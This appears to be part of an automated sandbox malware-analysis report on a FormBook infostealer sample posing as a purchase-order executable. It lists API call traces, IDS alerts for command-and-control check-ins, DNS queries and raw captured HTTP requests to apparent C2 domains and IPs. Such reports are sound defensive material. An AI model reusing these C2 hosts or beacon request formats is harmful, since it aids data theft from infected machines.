Source: Binary string: wntdll.pdbUGP | source: Purchase Order_ AEPL-2324-1126.exe, 00000000.00000003.1472280499.0000000004680000.00000004.00001000.00020000.00000000.sdmp, Purchase Order_ AEPL-2324-1126.exe, 00000000.00000003.1471126837.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1628089939.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1500202206.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1628089939.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498259750.0000000003300000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000005.00000002.3869522876.00000000046BE000.00000040.00001000.00020000.00000000.sdmp, grpconv.exe, 00000005.00000003.1630288499.000000000436D000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000005.00000003.1627999026.00000000041BD000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000005.00000002.3869522876.0000000004520000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: Purchase Order_ AEPL-2324-1126.exe, 00000000.00000003.1472280499.0000000004680000.00000004.00001000.00020000.00000000.sdmp, Purchase Order_ AEPL-2324-1126.exe, 00000000.00000003.1471126837.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1628089939.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1500202206.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1628089939.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498259750.0000000003300000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, grpconv.exe, 00000005.00000002.3869522876.00000000046BE000.00000040.00001000.00020000.00000000.sdmp, grpconv.exe, 00000005.00000003.1630288499.000000000436D000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000005.00000003.1627999026.00000000041BD000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000005.00000002.3869522876.0000000004520000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: svchost.pdb | source: grpconv.exe, 00000005.00000002.3859947867.000000000279A000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000005.00000002.3870343838.0000000004B4C000.00000004.10000000.00040000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000006.00000000.1694933032.0000000002C6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1925812145.00000000214CC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP | source: grpconv.exe, 00000005.00000002.3859947867.000000000279A000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000005.00000002.3870343838.0000000004B4C000.00000004.10000000.00040000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000006.00000000.1694933032.0000000002C6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1925812145.00000000214CC000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_0045DE8F FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 5_2_002EC5F0 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 5_2_002D9B30 4x nop then xor eax, eax
Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 5_2_043004E8 4x nop then mov ebx, 00000004h

            Networking

Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49728 -> 198.50.252.64:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49709 -> 38.47.232.196:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49711 -> 38.47.232.196:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49740 -> 199.59.243.227:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49720 -> 195.110.124.133:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49739 -> 199.59.243.227:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49754 -> 154.38.114.205:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49744 -> 62.149.128.40:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49737 -> 199.59.243.227:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49726 -> 198.50.252.64:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49703 -> 81.2.196.19:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49712 -> 38.47.232.196:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49714 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49753 -> 154.38.114.205:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49760 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49741 -> 62.149.128.40:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49729 -> 85.159.66.93:80
Source: Network traffic | Suricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.7:49741 -> 62.149.128.40:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49759 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49742 -> 62.149.128.40:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49746 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49704 -> 103.21.221.4:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49717 -> 195.110.124.133:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49735 -> 142.250.186.51:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49718 -> 195.110.124.133:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49751 -> 154.198.53.36:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49707 -> 103.21.221.4:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49752 -> 154.198.53.36:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49716 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49705 -> 103.21.221.4:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49736 -> 142.250.186.51:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49734 -> 142.250.186.51:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49723 -> 162.0.238.246:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49756 -> 154.38.114.205:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49757 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49758 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49731 -> 85.159.66.93:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49710 -> 38.47.232.196:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49725 -> 198.50.252.64:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49749 -> 154.198.53.36:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49722 -> 162.0.238.246:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49708 -> 103.21.221.4:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49724 -> 162.0.238.246:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49743 -> 62.149.128.40:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49750 -> 154.198.53.36:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49747 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49727 -> 198.50.252.64:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49732 -> 85.159.66.93:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49738 -> 199.59.243.227:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49719 -> 195.110.124.133:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49730 -> 85.159.66.93:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49715 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49713 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49733 -> 142.250.186.51:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49745 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49721 -> 162.0.238.246:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49748 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49755 -> 154.38.114.205:80
            Source: DNS query: www.rtpngk.xyz
            Source: DNS query: www.shopdj00.xyz
            Source: DNS query: www.085bet.xyz
            Source: Joe Sandbox View, IP Address: 198.50.252.64
            Source: Joe Sandbox View, IP Address: 62.149.128.40
            Source: Joe Sandbox View, ASN Name: NAMECHEAP-NETUS
            Source: Joe Sandbox View, ASN Name: OVHFR
            Source: Joe Sandbox View, ASN Name: COGENT-174US
            Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1 (16 occurrences)
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe, Code function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
            Source: global trafficHTTP traffic detected: GET /ye3m/?mtJD_=fvdlJ2L&76=BO45+0u1emCE8p481TGhlGJRfjijEniKMfSBNkuCyA4PSNUX9OtmTTSsRjXRpS6xcva9ZoEmbKYu7sV13UJQ2VHV0V6wg3gLfDQvPBhIAhk7jspRbUMiRCt8g415t+g4yzmjfyP2O5kn HTTP/1.1Host: www.kovallo.cloudAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
            Source: global trafficHTTP traffic detected: GET /phdl/?76=RacNMaTPN8PTLvXR9NF5eW2iQDieTkk5np6gf4eeXsIapVFDjThj3jiQkVzZmExioktz4vqZ0cfToK8eCYqJupED41Yr5DEkLX4m9t/uleGnewHbryEHDsS5u5fKmXjTxI+rab/4BaXG&mtJD_=fvdlJ2L HTTP/1.1Host: www.tempatmudisini01.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
            Source: global trafficHTTP traffic detected: GET /2lu6/?76=PbAz0EfTKowYn11d9L8KeIyoxyngBHbvlbcT88jVQuwl479Ud/v94CC+Ex+uZY8Wq5vHWUIm1erRj2VcHYbUz5WJs9RaUjKCQ9bJpumP+lrR5hAi4gPt8UgQTkM/uAhjmqXAbZ9LXA/l&mtJD_=fvdlJ2L HTTP/1.1Host: www.zz82x.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
            Source: global trafficHTTP traffic detected: GET /yhsl/?76=5EuG8q3RnsmESHA8JVSnlizd0lq9q8glk1nzqEFI9PKQqCJAfa6foAENeypwFyQKjeyo2Uxd0f+FrZwD+wtTCitgNQzIzPqlhTclUhz8bxA3FGZPimHZW40XTk/UgPnbZQA2uTwzCdxs&mtJD_=fvdlJ2L HTTP/1.1Host: www.rtpngk.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
            Source: global trafficHTTP traffic detected: GET /7m8b/?76=TUpvsdJ0cs84UNNTqqi2wOMj02pU6E0u1A17Lrv5qeBoN9jB/n++wLdBNnRIp/FdR+Ur2HOcuniO4FwpOA1JnwQ/5G5V4geMmZeqJSORp3yZ3MMA5ZHYDD9/sYl5a677eMHhDnCl+rJp&mtJD_=fvdlJ2L HTTP/1.1Host: www.bluegirls.blogAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
            Source: global trafficHTTP traffic detected: GET /r48b/?76=+EEyxXn2ifp2lL4tSgcDej4IKTVVubAXRia9ZGYNaFbCIrCUSrCroJ1ltkc3MgDLuvAkyd1hc3+ySf3CEzuTuCrdjxUcb6kt1JtpL21e+JT78DJZMGSekOhJaCk+Ht+qyblm0D0jZ5Dr&mtJD_=fvdlJ2L HTTP/1.1Host: www.mistsui.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
            Source: global trafficHTTP traffic detected: GET /s5b1/?mtJD_=fvdlJ2L&76=Yf0zZ3jBoCdhuzLDLj91Ws8HprJqzGXqNpWi9hWRQAr/e4SYtEvUr1BCdCQtsdxZ1OdzkDb6zzma4zXRjMwopMxEpmqXXuUrncqDeB64G5UYzEp6MWYeviVvJyEh+kzS7xrr7DyksnLe HTTP/1.1Host: www.solisbysobha.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
            Source: global trafficHTTP traffic detected: GET /hel6/?76=o5DytMykkaK7sxNXVTYwbJ0nas7Lrf6+xSFmwBlJgutuTdBVL+3Ld5pnGP5bgJpbKreJsN3lh4gHWJ53LIGu8bA2yj0UpLyBdZ5DgjAe+Y8tl6D74j+Er65lZkEVlLJH6zUxwY6EHphi&mtJD_=fvdlJ2L HTTP/1.1Host: www.sppsuperplast.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
            Source: global trafficHTTP traffic detected: GET /i06p/?76=Vpg7jNNJFscOYvB4AFVvnCABD6vaG9WwQKsmOhPgVM6zGb6O3kTWptBkzi24RSKPCbgQwpMWpgmK77FhrxpjTuP7OZT72bn7m/6/2woT1FIIWI10rq/bHfXKD/PO7OFh2Gu8aqkRsDAe&mtJD_=fvdlJ2L HTTP/1.1Host: www.deefbank.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
            Source: global trafficHTTP traffic detected: GET /8dtf/?76=n4Dn6BhRGXgBCc8VvzeMEOXmG0Elz5lGLePoshfoMkwgvj9XBMT8fCSzJRDbu+yD5cpoNGctvaCBzFD7eo0ZE+1Jdoxfd5POcRUtDqQJ70nv82NNqRSJamvbeDYUZbHlz6Y0RwscVapw&mtJD_=fvdlJ2L HTTP/1.1Host: www.donante-de-ovulos.bizAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
            Source: global trafficHTTP traffic detected: GET /uesf/?76=z4JBjkhdawOvrgQ3/n9w4VhuG3+mvNpQWeVdJRkYJDu2YFtbuhkNmpkohWu/kto2VaQ1uMJYrSrWzkHi22xejudxEXfvpm+SoyIUt5G98Vt9xyNVSrHPgcfLvBC9CdBqRcbgarcrONxp&mtJD_=fvdlJ2L HTTP/1.1Host: www.chalet-tofane.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
            Source: global trafficHTTP traffic detected: GET /gxfy/?76=CIIanhHRMgNozks5RGfJdUNX3+emzbgNf/VP7kRsN6vN0WzMvG3G9UIg+8jiJKvurCAh0c8eANy2Q8bdeXyR4StCmoJcjfzG5pIm3u+OPQ8SG4xTUPnFxO8c++BkIyDygdbta7ejYT5g&mtJD_=fvdlJ2L HTTP/1.1Host: www.greekhause.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
            Source: global trafficHTTP traffic detected: GET /1zd7/?76=bC1YIRSSuZYlVnS9hsNuhorKbcQ6ntdnx8KhpmCqECpWzN5SjPNMNLi+QdUYzo4UT/zMJg8CHwvIOMobHOZol4uZ599UMLQvIcSN6ebgMaMOQVLVUFO0QXCtqgKNb3wKU9pkkDiIxWQO&mtJD_=fvdlJ2L HTTP/1.1Host: www.085bet.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
            Source: global trafficHTTP traffic detected: GET /xedw/?mtJD_=fvdlJ2L&76=iU86b+DQDkc5+HCYi3wksyID7wIiKcPt1qIOrYUg5TrYQuRHlXYNPzVksVl/dHByk+JFXw+Aj1EfBi5c9qhjsEIOS1JRVa1wxHxBhUP989bRn8j6x1DUcRzlbseaRz6IPahZbjf8tblS HTTP/1.1Host: www.2024tengxun361.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
            Source: global trafficHTTP traffic detected: GET /8xob/?76=A14vC586VW4zZwTD5W+icFgZA3/gFFWkfN+k13nedPAvAgeoNHQOmzzfD2mClB7mOSU9pQTtzUjUfjrPrdgjVCIgZM4LbXLF8ymXXAVuMS/ObX4kzH9c4ewBdY7tnGrMOo/XDCkVFvSq&mtJD_=fvdlJ2L HTTP/1.1Host: www.bodegamayorista.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
            Source: global traffic, DNS traffic detected: DNS query: www.kovallo.cloud
            Source: global traffic, DNS traffic detected: DNS query: www.tempatmudisini01.click
            Source: global traffic, DNS traffic detected: DNS query: www.zz82x.top
            Source: global traffic, DNS traffic detected: DNS query: www.rtpngk.xyz
            Source: global traffic, DNS traffic detected: DNS query: www.bluegirls.blog
            Source: global traffic, DNS traffic detected: DNS query: www.mistsui.top
            Source: global traffic, DNS traffic detected: DNS query: www.solisbysobha.net
            Source: global traffic, DNS traffic detected: DNS query: www.sppsuperplast.online
            Source: global traffic, DNS traffic detected: DNS query: www.deefbank.net
            Source: global traffic, DNS traffic detected: DNS query: www.shopdj00.xyz
            Source: global traffic, DNS traffic detected: DNS query: www.donante-de-ovulos.biz
            Source: global traffic, DNS traffic detected: DNS query: www.chalet-tofane.net
            Source: global traffic, DNS traffic detected: DNS query: www.greekhause.org
            Source: global traffic, DNS traffic detected: DNS query: www.085bet.xyz
            Source: global traffic, DNS traffic detected: DNS query: www.2024tengxun361.buzz
            Source: global traffic, DNS traffic detected: DNS query: www.bodegamayorista.online
            Source: unknownHTTP traffic detected: POST /phdl/ HTTP/1.1Host: www.tempatmudisini01.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.tempatmudisini01.clickContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Content-Length: 215Connection: closeReferer: http://www.tempatmudisini01.click/phdl/User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11Data Raw: 37 36 3d 63 59 30 74 50 74 6e 51 4a 2b 2f 32 5a 62 4b 45 36 59 49 32 62 46 4b 38 55 44 69 68 53 69 38 38 37 4b 6e 71 63 59 2f 77 63 36 78 67 73 48 38 36 6e 6e 67 77 30 77 6e 30 77 6c 7a 58 6d 32 39 44 71 42 42 55 75 66 57 43 78 75 6e 43 2f 34 6f 73 45 4c 4f 57 67 64 51 53 34 47 59 65 79 67 30 58 49 6a 41 4c 34 71 72 6f 67 75 4b 52 50 55 4c 64 73 57 6b 66 41 38 36 30 72 59 32 54 73 43 71 67 2b 65 32 36 53 61 62 4a 43 2f 6e 52 45 4a 32 39 32 33 67 30 76 6a 55 37 68 59 6e 6a 50 30 33 59 56 6a 6d 2b 63 71 42 38 6f 53 48 62 68 70 30 77 4d 72 55 6b 79 68 77 4f 49 58 74 46 64 75 43 6e 2f 6d 79 78 38 71 68 7a 64 67 69 66 50 55 4e 4e 41 67 3d 3d Data Ascii: 76=cY0tPtnQJ+/2ZbKE6YI2bFK8UDihSi887KnqcY/wc6xgsH86nngw0wn0wlzXm29DqBBUufWCxunC/4osELOWgdQS4GYeyg0XIjAL4qroguKRPULdsWkfA860rY2TsCqg+e26SabJC/nREJ2923g0vjU7hYnjP03YVjm+cqB8oSHbhp0wMrUkyhwOIXtFduCn/myx8qhzdgifPUNNAg==
